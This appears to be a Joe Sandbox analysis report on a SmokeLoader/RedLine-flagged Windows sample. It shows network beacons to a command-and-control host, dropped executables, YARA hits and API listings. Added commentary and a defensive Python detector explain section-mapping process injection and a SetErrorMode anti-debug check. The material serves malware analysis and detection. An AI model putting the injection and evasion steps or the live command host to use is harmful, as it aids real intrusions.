                          Data Raw: 00 00 00 00 00 00 00 00 03 00 00 00 fd ff ff ff 92 00 00 00 00 00 00 00 00 00 00 2d 00 00 00 fe ff ff ff 97 00 a0 a0 a0 ff ff d9 24 39 65 31 34 36 62 65 39 2d 63 37 36 61 2d 34 37 32 30 2d 62 63 64 62 2d 35 33 30 31 31 62 38 37 62 64 30 36 ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff
                          Data Ascii: -$9e146be9-c76a-4720-bcdb-53011b87bd06
                          Timestamp:2024-08-06 12:49:11 UTC
                          Bytes transferred:522
                          Direction:IN
                          Data:
                          HTTP/1.1 204 No Content
                          Date: Tue, 06 Aug 2024 12:49:11 GMT
                          Connection: close
                          CF-Cache-Status: DYNAMIC
                          Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=qYxTjHACgf2helhJUzMTxJ40Z840w7tfHrQfyHVYurd4MLLYa1i1gOQNREmaRc8990AyzWKqAC%2BJ%2FlD%2FTdlz1QWkNSBgntioco08UNvhma9Q1yFMy8YUmqM1oyidaiG5LobPf0vSsLQ%3D"}],"group":"cf-nel","max_age":604800}
                          NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                          Server: cloudflare
                          CF-RAY: 8aef2539da8d41b4-EWR
                          alt-svc: h3=":443"; ma=86400


                          Session ID:3
                          Source IP:192.168.2.4
                          Source Port:49758
                          Destination IP:188.114.97.3
                          Destination Port:443
                          PID:5312
                          Process:C:\Users\user\AppData\Local\Temp\AA31.exe
                          Timestamp:2024-08-06 12:49:18 UTC
                          Bytes transferred:351
                          Direction:OUT
                          Data:
                          POST /imageFolio.cgi?qehii0w3ze9sn=nO6wgakvlUvUKyvVvRezNJaB0mAvGbPqVKo12a3LOUvhvPrA9eFcs3uIBjr2ICTAiCiRSrnI1BD1Zngf6t0fTw%3D%3D HTTP/1.1
                          Connection: Keep-Alive
                          Accept: */*
                          User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/120.0.0.0 Safari/537.36
                          Content-Length: 96
                          Host: mundoparachicas.space
                          Timestamp:2024-08-06 12:49:18 UTC
                          Bytes transferred:96
                          Direction:OUT
                          Data Raw: fd ff ff ff 03 00 00 00 00 00 00 00 00 00 00 00 92 00 00 fe ff ff ff 2d 00 00 00 00 00 00 00 00 00 00 00 97 00 a0 a0 a0 ff ff d9 24 39 65 31 34 36 62 65 39 2d 63 37 36 61 2d 34 37 32 30 2d 62 63 64 62 2d 35 33 30 31 31 62 38 37 62 64 30 36 ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff
                          Data Ascii: -$9e146be9-c76a-4720-bcdb-53011b87bd06
                          Timestamp:2024-08-06 12:49:18 UTC
                          Bytes transferred:524
                          Direction:IN
                          Data:
                          HTTP/1.1 204 No Content
                          Date: Tue, 06 Aug 2024 12:49:18 GMT
                          Connection: close
                          CF-Cache-Status: DYNAMIC
                          Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=vkl9jwW8R6VtGA6e8vo6kbJ1%2Bok9scEzXOKfYwNXk0o%2Flf8Lz6mRQOyXtIhLIT7%2BImxaEQqewASM25QAG7QVRcjoWIuZs3KN9drdrSgo%2FRxGGmWt5KrP4olEFvINQthLha16T4uXMl0%3D"}],"group":"cf-nel","max_age":604800}
                          NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                          Server: cloudflare
                          CF-RAY: 8aef2567ea6e4302-EWR
                          alt-svc: h3=":443"; ma=86400


                          Target ID:0
                          Start time:08:47:52
                          Start date:06/08/2024
                          Path:C:\Users\user\Desktop\n72I7qB2ss.exe
                          Wow64 process (32bit):true
                          Commandline:"C:\Users\user\Desktop\n72I7qB2ss.exe"
                          Imagebase:0x400000
                          File size:215'552 bytes
                          MD5 hash:A3F7B743EFAB28654F201A43A0E349C5
                          Has elevated privileges:true
                          Has administrator privileges:true
                          Programmed in:C, C++ or other language
                          Yara matches:
                          • Rule: JoeSecurity_SmokeLoader_2, Description: Yara detected SmokeLoader, Source: 00000000.00000002.1768976686.00000000005F0000.00000004.00001000.00020000.00000000.sdmp, Author: Joe Security
                          • Rule: Windows_Trojan_Smokeloader_4e31426e, Description: unknown, Source: 00000000.00000002.1768976686.00000000005F0000.00000004.00001000.00020000.00000000.sdmp, Author: unknown
                          • Rule: Windows_Trojan_RedLineStealer_ed346e4c, Description: unknown, Source: 00000000.00000002.1769088650.000000000065B000.00000040.00000020.00020000.00000000.sdmp, Author: unknown
                          • Rule: JoeSecurity_SmokeLoader_2, Description: Yara detected SmokeLoader, Source: 00000000.00000002.1769015337.0000000000611000.00000004.10000000.00040000.00000000.sdmp, Author: Joe Security
                          • Rule: Windows_Trojan_Smokeloader_4e31426e, Description: unknown, Source: 00000000.00000002.1769015337.0000000000611000.00000004.10000000.00040000.00000000.sdmp, Author: unknown
                          • Rule: Windows_Trojan_Smokeloader_3687686f, Description: unknown, Source: 00000000.00000002.1768940641.00000000005D0000.00000040.00001000.00020000.00000000.sdmp, Author: unknown
                          Reputation:low
                          Has exited:true

                          Target ID:1
                          Start time:08:48:04
                          Start date:06/08/2024
                          Path:C:\Windows\explorer.exe
                          Wow64 process (32bit):false
                          Commandline:C:\Windows\Explorer.EXE
                          Imagebase:0x7ff72b770000
                          File size:5'141'208 bytes
                          MD5 hash:662F4F92FDE3557E86D110526BB578D5
                          Has elevated privileges:false
                          Has administrator privileges:false
                          Programmed in:C, C++ or other language
                          Reputation:high
                          Has exited:false

                          Target ID:5
                          Start time:08:48:24
                          Start date:06/08/2024
                          Path:C:\Users\user\AppData\Roaming\ashcvvs
                          Wow64 process (32bit):true
                          Commandline:C:\Users\user\AppData\Roaming\ashcvvs
                          Imagebase:0x400000
                          File size:215'552 bytes
                          MD5 hash:A3F7B743EFAB28654F201A43A0E349C5
                          Has elevated privileges:false
                          Has administrator privileges:false
                          Programmed in:C, C++ or other language
                          Yara matches:
                          • Rule: Windows_Trojan_Smokeloader_3687686f, Description: unknown, Source: 00000005.00000002.2060795194.00000000006D0000.00000040.00001000.00020000.00000000.sdmp, Author: unknown
                          • Rule: JoeSecurity_SmokeLoader_2, Description: Yara detected SmokeLoader, Source: 00000005.00000002.2060983151.00000000020B1000.00000004.10000000.00040000.00000000.sdmp, Author: Joe Security
                          • Rule: Windows_Trojan_Smokeloader_4e31426e, Description: unknown, Source: 00000005.00000002.2060983151.00000000020B1000.00000004.10000000.00040000.00000000.sdmp, Author: unknown
                          • Rule: JoeSecurity_SmokeLoader_2, Description: Yara detected SmokeLoader, Source: 00000005.00000002.2060932056.0000000002080000.00000004.00001000.00020000.00000000.sdmp, Author: Joe Security
                          • Rule: Windows_Trojan_Smokeloader_4e31426e, Description: unknown, Source: 00000005.00000002.2060932056.0000000002080000.00000004.00001000.00020000.00000000.sdmp, Author: unknown
                          • Rule: Windows_Trojan_RedLineStealer_ed346e4c, Description: unknown, Source: 00000005.00000002.2060868077.00000000006F9000.00000040.00000020.00020000.00000000.sdmp, Author: unknown
                          Antivirus matches:
                          • Detection: 100%, Avira
                          • Detection: 100%, Joe Sandbox ML
                          • Detection: 71%, ReversingLabs
                          Reputation:low
                          Has exited:true

                          Target ID:6
                          Start time:08:48:52
                          Start date:06/08/2024
                          Path:C:\Users\user\AppData\Local\Temp\70C1.exe
                          Wow64 process (32bit):false
                          Commandline:C:\Users\user\AppData\Local\Temp\70C1.exe
                          Imagebase:0x7ff7dad60000
                          File size:2'064'896 bytes
                          MD5 hash:2B113C0906841F9AEAAFBD43C7CD37C4
                          Has elevated privileges:false
                          Has administrator privileges:false
                          Programmed in:C, C++ or other language
                          Antivirus matches:
                          • Detection: 32%, ReversingLabs
                          Reputation:low
                          Has exited:true

                          Target ID:7
                          Start time:08:48:59
                          Start date:06/08/2024
                          Path:C:\Users\user\AppData\Local\Temp\AA31.exe
                          Wow64 process (32bit):false
                          Commandline:C:\Users\user\AppData\Local\Temp\AA31.exe
                          Imagebase:0x7ff65b030000
                          File size:2'097'152 bytes
                          MD5 hash:85B1854B81D15AC9116AA200304D7CA0
                          Has elevated privileges:false
                          Has administrator privileges:false
                          Programmed in:C, C++ or other language
                          Antivirus matches:
                          • Detection: 54%, ReversingLabs
                          Reputation:low
                          Has exited:true

                          Target ID:9
                          Start time:08:50:01
                          Start date:06/08/2024
                          Path:C:\Users\user\AppData\Roaming\ashcvvs
                          Wow64 process (32bit):true
                          Commandline:C:\Users\user\AppData\Roaming\ashcvvs
                          Imagebase:0x400000
                          File size:215'552 bytes
                          MD5 hash:A3F7B743EFAB28654F201A43A0E349C5
                          Has elevated privileges:false
                          Has administrator privileges:false
                          Programmed in:C, C++ or other language
                          Reputation:low
                          Has exited:false

                            Execution Graph

                            Execution Coverage:5.3%
                            Dynamic/Decrypted Code Coverage:24.6%
                            Signature Coverage:48.5%
                            Total number of Nodes:134
                            Total number of Limit Nodes:5

                            Control-flow Graph

                            APIs
                            • GetLogicalDriveStringsW.KERNEL32(00000000,00000000), ref: 00423821
                            • DeleteVolumeMountPointW.KERNEL32(00000000), ref: 00423828
                            • GetCommandLineA.KERNEL32 ref: 0042382E
                            • lstrcatW.KERNEL32(?,00000000), ref: 00423853
                            • InterlockedExchange.KERNEL32(?,00000000), ref: 0042385F
                            • GetActiveWindow.USER32 ref: 00423865
                            • GetSystemWindowsDirectoryW.KERNEL32(?,00000000), ref: 00423874
                            • WriteConsoleW.KERNEL32(00000000,?,00000000,?,00000000), ref: 0042388A
                            • IntersectRect.USER32(?,?,00000000), ref: 0042389B
                            • FlushInstructionCache.KERNEL32(00000000,00000000,00000000), ref: 004238A4
                            • GetAtomNameA.KERNEL32(00000000,?,00000000), ref: 004238B4
                            • GlobalDeleteAtom.KERNEL32(00000000), ref: 004238BB
                            • GetCurrentConsoleFont.KERNEL32(00000000,00000000,?), ref: 004238C8
                            • SearchPathA.KERNEL32(0042852C,00428518,004284E4,00000000,?,?), ref: 004238EB
                            • GetDefaultCommConfigA.KERNEL32(00000000,?,00000000), ref: 0042390C
                            • DebugBreak.KERNEL32 ref: 00423912
                            • EnumDateFormatsW.KERNEL32(00000000,00000000,00000000), ref: 0042391B
                            • SetCommMask.KERNELBASE(00000000,00000000), ref: 0042394C
                            • GetTickCount.KERNEL32 ref: 00423952
                            • GetSystemTimes.KERNELBASE(?,?,?), ref: 00423967
                            • FoldStringW.KERNEL32(00000000,00000000,00000000,00000000,00000000), ref: 0042398D
                            • OpenWaitableTimerA.KERNEL32(00000000,00000000,00000000), ref: 004239AF
                            • HeapLock.KERNEL32(00000000), ref: 004239B6
                            • FormatMessageW.KERNEL32(00000000,00000000,00000000,00000000,?,00000000,00000000), ref: 004239CA
                            • GlobalAlloc.KERNELBASE(00000000), ref: 00423A48
                            • LoadLibraryA.KERNELBASE(00428574), ref: 00423A8B
                            Strings
                            Memory Dump Source
                            • Source File: 00000000.00000002.1768787533.0000000000416000.00000020.00000001.01000000.00000003.sdmp, Offset: 00416000, based on PE: false
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_0_2_416000_n72I7qB2ss.jbxd
                            Similarity
                            • API ID: AtomCommConsoleDeleteGlobalSystem$ActiveAllocBreakCacheCommandConfigCountCurrentDateDebugDefaultDirectoryDriveEnumExchangeFlushFoldFontFormatFormatsHeapInstructionInterlockedIntersectLibraryLineLoadLockLogicalMaskMessageMountNameOpenPathPointRectSearchStringStringsTickTimerTimesVolumeWaitableWindowWindowsWritelstrcat
                            • String ID: VirtualProtect$}$
                            • API String ID: 693232001-3575559497
                            • Opcode ID: 458ea9c994ca7e43693011cce1549fc3b33e6df546367350751d41966682c02c
                            • Instruction ID: 8dbc5d9f7ccbc57e8f3c20c9d260084f9863f046cce8ff7655e10ccfc7c1cc5d
                            • Opcode Fuzzy Hash: 458ea9c994ca7e43693011cce1549fc3b33e6df546367350751d41966682c02c
                            • Instruction Fuzzy Hash: B8819072606130AFC721AF61EC49C9F7BACEF4A355B80443AF585D2161DB3C4646CBAE

                            Control-flow Graph

                            APIs
                            • NtDuplicateObject.NTDLL(?,000000FF,000000FF,?,00000000,00000000,00000002), ref: 004015D0
                            • NtCreateSection.NTDLL(?,00000006,00000000,?,00000004,08000000,00000000), ref: 004015FD
                            • NtMapViewOfSection.NTDLL(?,000000FF,?,00000000,00000000,00000000,00000000,00000001,00000000,00000004,?), ref: 00401620
                            • NtMapViewOfSection.NTDLL(?,?,?,00000000,00000000,00000000,00000000,00000001,00000000,00000004), ref: 0040163E
                            • NtCreateSection.NTDLL(?,0000000E,00000000,?,00000040,08000000,00000000), ref: 0040167F
                            • NtMapViewOfSection.NTDLL(?,000000FF,?,00000000,00000000,00000000,00000000,00000001,00000000,00000004,?), ref: 004016B0
                            • NtMapViewOfSection.NTDLL(?,?,?,00000000,00000000,00000000,00000000,00000001,00000000,00000020), ref: 004016D2
                            Memory Dump Source
                            • Source File: 00000000.00000002.1768768688.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_0_2_400000_n72I7qB2ss.jbxd
                            Similarity
                            • API ID: Section$View$Create$DuplicateObject
                            • String ID:
                            • API String ID: 1546783058-0
                            • Opcode ID: 885e936b73f6e8672a606013276db408b22f0ef5eb4ebd1effef6bd76d7f6a50
                            • Instruction ID: ebc0160933c68a8b7ae7f1ca7eda0dd03739b2ad6b995580a9f4ea7b057fd4c7
                            • Opcode Fuzzy Hash: 885e936b73f6e8672a606013276db408b22f0ef5eb4ebd1effef6bd76d7f6a50
                            • Instruction Fuzzy Hash: AB616171600204FBEB209F95DC49FAF7BB8EF85B00F14412AFA12BA1E4D7759A01DB25

                            Control-flow Graph

                            APIs
                            • NtDuplicateObject.NTDLL(?,000000FF,000000FF,?,00000000,00000000,00000002), ref: 004015D0
                            • NtCreateSection.NTDLL(?,00000006,00000000,?,00000004,08000000,00000000), ref: 004015FD
                            • NtMapViewOfSection.NTDLL(?,000000FF,?,00000000,00000000,00000000,00000000,00000001,00000000,00000004,?), ref: 00401620
                            • NtMapViewOfSection.NTDLL(?,?,?,00000000,00000000,00000000,00000000,00000001,00000000,00000004), ref: 0040163E
                            • NtCreateSection.NTDLL(?,0000000E,00000000,?,00000040,08000000,00000000), ref: 0040167F
                            • NtMapViewOfSection.NTDLL(?,000000FF,?,00000000,00000000,00000000,00000000,00000001,00000000,00000004,?), ref: 004016B0
                            • NtMapViewOfSection.NTDLL(?,?,?,00000000,00000000,00000000,00000000,00000001,00000000,00000020), ref: 004016D2
                            Memory Dump Source
                            • Source File: 00000000.00000002.1768768688.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_0_2_400000_n72I7qB2ss.jbxd
                            Similarity
                            • API ID: Section$View$Create$DuplicateObject
                            • String ID:
                            • API String ID: 1546783058-0
                            • Opcode ID: a8b1234f8d45d2fb401cfb213eb4a96e35d5497f76bb2019505792229240a42f
                            • Instruction ID: 81614cc47252d4ee750cd10e5f363bec598540b14c8849c2392ba6a7819565d6
                            • Opcode Fuzzy Hash: a8b1234f8d45d2fb401cfb213eb4a96e35d5497f76bb2019505792229240a42f
                            • Instruction Fuzzy Hash: 8B5137B1900248BFEF209F91CC49FEFBBB8EF85B00F144159FA11BA2A5D6759905CB24

                            Control-flow Graph

                            APIs
                            • NtDuplicateObject.NTDLL(?,000000FF,000000FF,?,00000000,00000000,00000002), ref: 004015D0
                            • NtCreateSection.NTDLL(?,00000006,00000000,?,00000004,08000000,00000000), ref: 004015FD
                            • NtMapViewOfSection.NTDLL(?,000000FF,?,00000000,00000000,00000000,00000000,00000001,00000000,00000004,?), ref: 00401620
                            • NtMapViewOfSection.NTDLL(?,?,?,00000000,00000000,00000000,00000000,00000001,00000000,00000004), ref: 0040163E
                            • NtCreateSection.NTDLL(?,0000000E,00000000,?,00000040,08000000,00000000), ref: 0040167F
                            • NtMapViewOfSection.NTDLL(?,000000FF,?,00000000,00000000,00000000,00000000,00000001,00000000,00000004,?), ref: 004016B0
                            • NtMapViewOfSection.NTDLL(?,?,?,00000000,00000000,00000000,00000000,00000001,00000000,00000020), ref: 004016D2
                            Memory Dump Source
                            • Source File: 00000000.00000002.1768768688.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_0_2_400000_n72I7qB2ss.jbxd
                            Similarity
                            • API ID: Section$View$Create$DuplicateObject
                            • String ID:
                            • API String ID: 1546783058-0
                            • Opcode ID: e5a74de420fb2eda0c6ba418abc3b2a4ecf354f77255eeea8c235c1433f6c9fb
                            • Instruction ID: d0bd6428bf20664bceabbb55207a57fb76a02318494b8c1f9a1cb2173d989cf6
                            • Opcode Fuzzy Hash: e5a74de420fb2eda0c6ba418abc3b2a4ecf354f77255eeea8c235c1433f6c9fb
                            • Instruction Fuzzy Hash: 565128B1900249BBEF209F91CC48FAFBBB8EF85B10F144159FA11BA2A5D7719941CB24

                            Control-flow Graph
                            • Function 402fd3-40312f; API-calling block: 4030b8-403127 RtlCreateUserThread, NtTerminateProcess; exit block 40312a-40312f; loop 40303c-40304a spins on itself
                            APIs
                            Memory Dump Source
                            • Source File: 00000000.00000002.1768768688.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_0_2_400000_n72I7qB2ss.jbxd
                            Similarity
                            • API ID: CreateProcessTerminateThreadUser
                            • String ID:
                            • API String ID: 1921587553-0
                            • Opcode ID: 8dd8c1b6c2a2e81b31e5df05537a0a765b57e58f23bcff5050bac5d1a8738f05
                            • Instruction ID: c5f1771b03d6f6f48bc893f8c69e4bd59083146a95f7f1e574921d9c63f51eee
                            • Opcode Fuzzy Hash: 8dd8c1b6c2a2e81b31e5df05537a0a765b57e58f23bcff5050bac5d1a8738f05
                            • Instruction Fuzzy Hash: 9A412631218E088FD768EE6CA84576277D5FB98311F6643AAE809D3389FE34DC1183C9

                            Control-flow Graph
                            • Function 403149-4031b0 (calls 40120f at 40318a-403192); API-calling block: 4030fe-403127 RtlCreateUserThread, NtTerminateProcess, leading to exit block 40312a-40312f; block 4031b0 loops on itself
                            Memory Dump Source
                            • Source File: 00000000.00000002.1768768688.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_0_2_400000_n72I7qB2ss.jbxd
                            Similarity
                            • API ID:
                            • String ID:
                            • API String ID:
                            • Opcode ID: 0998c5da932cb652e732e08efa62070a5860df8833ed3ae03222be4492deafee
                            • Instruction ID: 15e76b100028984b8ee99d2dec5c44828c89a921298bb6101f651bfb9f41234e
                            • Opcode Fuzzy Hash: 0998c5da932cb652e732e08efa62070a5860df8833ed3ae03222be4492deafee
                            • Instruction Fuzzy Hash: 6F0128315186048BE7285E799886226BFA5EF18337F28037FD122E87D1E13E8707964F

                            Control-flow Graph
                            • Function 65eac0-65eb1e; API-calling blocks: 65eae4-65eaf0 CreateToolhelp32Snapshot, 65eb00-65eb0d Module32First; block 65eb0f-65eb10 calls 65e77f; blocks 65eaf2-65eafe loop back to 65eadb
                            APIs
                            • CreateToolhelp32Snapshot.KERNEL32(00000008,00000000), ref: 0065EAE8
                            • Module32First.KERNEL32(00000000,00000224), ref: 0065EB08
                            Memory Dump Source
                            • Source File: 00000000.00000002.1769088650.000000000065B000.00000040.00000020.00020000.00000000.sdmp, Offset: 0065B000, based on PE: false
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_0_2_65b000_n72I7qB2ss.jbxd
                            Yara matches
                            Similarity
                            • API ID: CreateFirstModule32SnapshotToolhelp32
                            • String ID:
                            • API String ID: 3833638111-0
                            • Opcode ID: 3788706d20f5b898e185810e19a2e38a50b9b544ac306a9cd33eedd6d527d18a
                            • Instruction ID: ff598abdde68f1b54279205c5ab36a24b5576781b2485dad03e6972e8461347a
                            • Opcode Fuzzy Hash: 3788706d20f5b898e185810e19a2e38a50b9b544ac306a9cd33eedd6d527d18a
                            • Instruction Fuzzy Hash: 59F0C2312007106BDB242AF4998CAAE72EDAF48326F100528EA43911C0DB71E9098661

                            Control-flow Graph
                            • Function 5d003c-5d091d; API-calling blocks: 5d004c-5d0263 VirtualAlloc (also calls 5d0a3f, 5d0e0f, 5d0d90), 5d02ce-5d03c2 VirtualProtect (calls 5d0cce, 5d0ce7), 5d0439-5d04b8 VirtualFree, 5d086e-5d08be LoadLibraryA; further subcalls: 5d0a69 from 5d0265-5d0289, 5d0ce7 from 5d03e2-5d0437; the blocks 5d04be-5d086c and 5d08c7-5d091d contain nested loops with no API calls
                            APIs
                            • VirtualAlloc.KERNELBASE(00000000,?,00001000,00000004), ref: 005D024D
                            Strings
                            Memory Dump Source
                            • Source File: 00000000.00000002.1768940641.00000000005D0000.00000040.00001000.00020000.00000000.sdmp, Offset: 005D0000, based on PE: false
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_0_2_5d0000_n72I7qB2ss.jbxd
                            Yara matches
                            Similarity
                            • API ID: AllocVirtual
                            • String ID: cess$kernel32.dll
                            • API String ID: 4275171209-1230238691
                            • Opcode ID: aaa6c488ea091c11cf1d14b1b8159415dd1a008d9b857f0942c425a8c5fa1e0a
                            • Instruction ID: fc9b128c1f50d28fefb36c0545add9695854d6336b218cbceaeb3d9a397e2676
                            • Opcode Fuzzy Hash: aaa6c488ea091c11cf1d14b1b8159415dd1a008d9b857f0942c425a8c5fa1e0a
                            • Instruction Fuzzy Hash: 7D526A74A01229DFDB64CF58C985BA8BBB1BF09314F1480DAE94DAB351DB30AE85DF14

                            Control-flow Graph
                            • Function 5d0e0f-5d0e2c; block 5d0e0f-5d0e24 calls SetErrorMode twice
                            APIs
                            • SetErrorMode.KERNELBASE(00000400,?,?,005D0223,?,?), ref: 005D0E19
                            • SetErrorMode.KERNELBASE(00000000,?,?,005D0223,?,?), ref: 005D0E1E
                            Memory Dump Source
                            • Source File: 00000000.00000002.1768940641.00000000005D0000.00000040.00001000.00020000.00000000.sdmp, Offset: 005D0000, based on PE: false
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_0_2_5d0000_n72I7qB2ss.jbxd
                            Yara matches
                            Similarity
                            • API ID: ErrorMode
                            • String ID:
                            • API String ID: 2340568224-0
                            • Opcode ID: 027e3930a8fc815aeaa48c4a19c17906f2e2d358c6b73c72f02d274321b10a64
                            • Instruction ID: c5d6d6fa0513ea3056317b239f3eb2f6e5cae715dba88dd75ef451771bbf1679
                            • Opcode Fuzzy Hash: 027e3930a8fc815aeaa48c4a19c17906f2e2d358c6b73c72f02d274321b10a64
                            • Instruction Fuzzy Hash: 47D0123114512877D7102A94DC09BCD7F1CDF05B62F008412FB0DD9180C770994046E5
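Reading the API listings above together: the function at 401553 creates a section with SECTION_MAP_WRITE|SECTION_MAP_READ (0x6) and PAGE_READWRITE (0x4), maps it into the current process (the 000000FF pseudo-handle) and into a second, unresolved process handle, then repeats the pair with SECTION_MAP_EXECUTE added (0xE), PAGE_EXECUTE_READWRITE (0x40) on the section and PAGE_EXECUTE_READ (0x20) on the remote view; the function at 402fd3 then reaches RtlCreateUserThread and NtTerminateProcess. That is the section-mapping process-injection primitive: write through the local view, execute through the remote one, start a thread there and exit. The SetErrorMode(0x400) / SetErrorMode(0) pair at 5d0e19-5d0e1e matches the documented SetErrorMode anti-debug check, which compares the previous mode returned by the second call with the value just set. The Python below is an added example, not part of the Joe Sandbox report: it parses API lines in the report's own format, decodes the constants and flags both patterns. The sample input is constructed from the lines shown above (their concatenation order is assumed), and treating 000000FF as the NtCurrentProcess pseudo-handle is an assumption about how the report prints -1.

```python
"""Flag section-mapping injection and the SetErrorMode anti-debug check in a
Joe Sandbox 'APIs' listing (Name.MODULE(hexargs...), ref: address).

Added example, not part of the report. Constant names are Windows SDK values;
treating 000000FF as the NtCurrentProcess pseudo-handle is an assumption."""
import re
from dataclasses import dataclass

# Constructed input: the report's API lines for the functions at 5d0e0f and
# 401553, concatenated in the order the control-flow suggests (assumed).
SAMPLE_API_LINES = """
• SetErrorMode.KERNELBASE(00000400,?,?,005D0223,?,?), ref: 005D0E19
• SetErrorMode.KERNELBASE(00000000,?,?,005D0223,?,?), ref: 005D0E1E
• NtDuplicateObject.NTDLL(?,000000FF,000000FF,?,00000000,00000000,00000002), ref: 004015D0
• NtCreateSection.NTDLL(?,00000006,00000000,?,00000004,08000000,00000000), ref: 004015FD
• NtMapViewOfSection.NTDLL(?,000000FF,?,00000000,00000000,00000000,00000000,00000001,00000000,00000004,?), ref: 00401620
• NtMapViewOfSection.NTDLL(?,?,?,00000000,00000000,00000000,00000000,00000001,00000000,00000004), ref: 0040163E
• NtCreateSection.NTDLL(?,0000000E,00000000,?,00000040,08000000,00000000), ref: 0040167F
• NtMapViewOfSection.NTDLL(?,000000FF,?,00000000,00000000,00000000,00000000,00000001,00000000,00000004,?), ref: 004016B0
• NtMapViewOfSection.NTDLL(?,?,?,00000000,00000000,00000000,00000000,00000001,00000000,00000020), ref: 004016D2
"""

API_LINE = re.compile(r"(\w+)\.(\w+)\(([^)]*)\),\s*ref:\s*([0-9A-Fa-f]+)")
PSEUDO_SELF = {0xFF, 0xFFFFFFFF}     # NtCurrentProcess() (-1) as the report prints it
SECTION_ACCESS = {0x1: "SECTION_QUERY", 0x2: "SECTION_MAP_WRITE",
                  0x4: "SECTION_MAP_READ", 0x8: "SECTION_MAP_EXECUTE"}
PAGE_PROT = {0x02: "PAGE_READONLY", 0x04: "PAGE_READWRITE",
             0x20: "PAGE_EXECUTE_READ", 0x40: "PAGE_EXECUTE_READWRITE"}


@dataclass
class Call:
    name: str
    module: str
    args: list   # int where the report resolved the value, None where it shows '?'
    ref: int     # call-site address


def parse_api_lines(text):
    calls = []
    for name, module, raw, ref in API_LINE.findall(text):
        args = [None if a.strip() == "?" else int(a, 16) for a in raw.split(",")]
        calls.append(Call(name, module, args, int(ref, 16)))
    return calls


def access_name(mask):
    names = [n for bit, n in SECTION_ACCESS.items() if mask & bit]
    return "|".join(names) if names else hex(mask)


def prot_name(prot):
    return "?" if prot is None else PAGE_PROT.get(prot, hex(prot))


def is_executable(prot):
    # every PAGE_EXECUTE* constant sets a bit in the 0xF0 nibble
    return prot is not None and bool(prot & 0xF0)


def find_section_injection(calls):
    """One finding per NtCreateSection that is followed, before the next one, by
    a NtMapViewOfSection into the current process and another into a handle the
    report could not resolve (a foreign process). Argument positions follow the
    ntdll prototypes: DesiredAccess=1, SectionPageProtection=4 for NtCreateSection;
    ProcessHandle=1, Win32Protect=9 for NtMapViewOfSection."""
    findings, i = [], 0
    while i < len(calls):
        if calls[i].name != "NtCreateSection":
            i += 1
            continue
        create, self_view, remote_view = calls[i], None, None
        j = i + 1
        while j < len(calls) and calls[j].name != "NtCreateSection":
            if calls[j].name == "NtMapViewOfSection":
                handle = calls[j].args[1]
                if handle in PSEUDO_SELF:
                    self_view = calls[j]
                elif handle is None:
                    remote_view = calls[j]
            j += 1
        if self_view and remote_view:
            remote_prot = remote_view.args[9]
            findings.append({
                "section_ref": create.ref,
                "access": access_name(create.args[1]),
                "section_protect": prot_name(create.args[4]),
                "remote_view_ref": remote_view.ref,
                "remote_view_protect": prot_name(remote_prot),
                # an executable remote view is the injection itself; a read/write
                # pair is the staging copy that usually precedes it
                "executable": is_executable(create.args[4]) or is_executable(remote_prot),
            })
        i = j
    return findings


def find_seterrormode_trick(calls):
    """SetErrorMode(0x400) immediately followed by SetErrorMode(0): the second call
    returns the previous mode, and a debugger or emulator that does not keep it
    hands the caller something other than 0x400."""
    return [calls[k].ref for k in range(len(calls) - 1)
            if calls[k].name == "SetErrorMode" and calls[k].args[0] == 0x400
            and calls[k + 1].name == "SetErrorMode" and calls[k + 1].args[0] == 0]


if __name__ == "__main__":
    calls = parse_api_lines(SAMPLE_API_LINES)
    for f in find_section_injection(calls):
        verdict = "INJECTION" if f["executable"] else "staging"
        print(f"section @{f['section_ref']:08X} {f['access']} {f['section_protect']}"
              f" -> remote view @{f['remote_view_ref']:08X} {f['remote_view_protect']}"
              f" [{verdict}]")
    for ref in find_seterrormode_trick(calls):
        print(f"SetErrorMode anti-debug check @{ref:08X}")
```

On the sample the first create/map pair is reported as staging (read/write on both sides) and the second as the injection (PAGE_EXECUTE_READWRITE section, PAGE_EXECUTE_READ remote view at 4016D2); the SetErrorMode pair is reported at 5D0E19. The same rules apply to any Joe Sandbox API listing pasted in place of the constructed sample.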

                            Control-flow Graph
                            • Single block 423467-423484 VirtualProtect
                            APIs
                            • VirtualProtect.KERNELBASE(00000040,?,?,?,00423A9B), ref: 0042347D
                            Memory Dump Source
                            • Source File: 00000000.00000002.1768787533.0000000000416000.00000020.00000001.01000000.00000003.sdmp, Offset: 00416000, based on PE: false
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_0_2_416000_n72I7qB2ss.jbxd
                            Similarity
                            • API ID: ProtectVirtual
                            • String ID:
                            • API String ID: 544645111-0
                            • Opcode ID: 9dbbffbc3c54b5c3a63e2c751ae658eddfc00eafb6b082af4fefa63f7fa846a4
                            • Instruction ID: cd11079ae9fe1b66df236ae7ddbd13e2ea7dadf25881c3163ba94d66086d63c1
                            • Opcode Fuzzy Hash: 9dbbffbc3c54b5c3a63e2c751ae658eddfc00eafb6b082af4fefa63f7fa846a4
                            • Instruction Fuzzy Hash: 5CC08CB1140109FFCF018B81EC06E593BADE300308F001131B701A1070C271AA21AB1D

